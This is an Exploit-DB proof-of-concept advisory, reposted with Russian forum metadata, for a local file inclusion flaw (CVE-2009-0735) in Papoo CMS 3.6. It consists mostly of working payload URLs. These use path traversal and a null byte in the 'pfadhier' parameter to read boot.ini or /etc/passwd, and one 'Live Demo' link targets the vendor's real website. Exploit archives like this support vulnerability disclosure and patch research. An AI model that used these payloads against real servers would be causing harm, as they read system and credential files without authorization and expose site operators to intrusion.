- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8030
- Проверка EDB
-
- Пройдено
- Автор
- SIRGOD
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-0735
- Дата публикации
- 2009-02-10
Код:
#########################################################################################################
[+] Papoo CMS 3.6 Local File Inclusion
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
[+] www.hellzone.info
#########################################################################################################
[+] Script Homepage : http://www.papoo-cms.com/
[+] Local File Inclusion
- PoC :
http://127.0.0.1/[path]/lib/classes/message_class.php?pfadhier=[Local
File]%00
- Example :
http://127.0.0.1/path/lib/classes/message_class.php?pfadhier=../../../../../../boot.ini%00
- Live Demo
http://www.papoo-cms.com/lib/classes/message_class.php?pfadhier=../../../../../../etc/passwd%00
#########################################################################################################
# milw0rm.com [2009-02-10]- Источник
- www.exploit-db.com
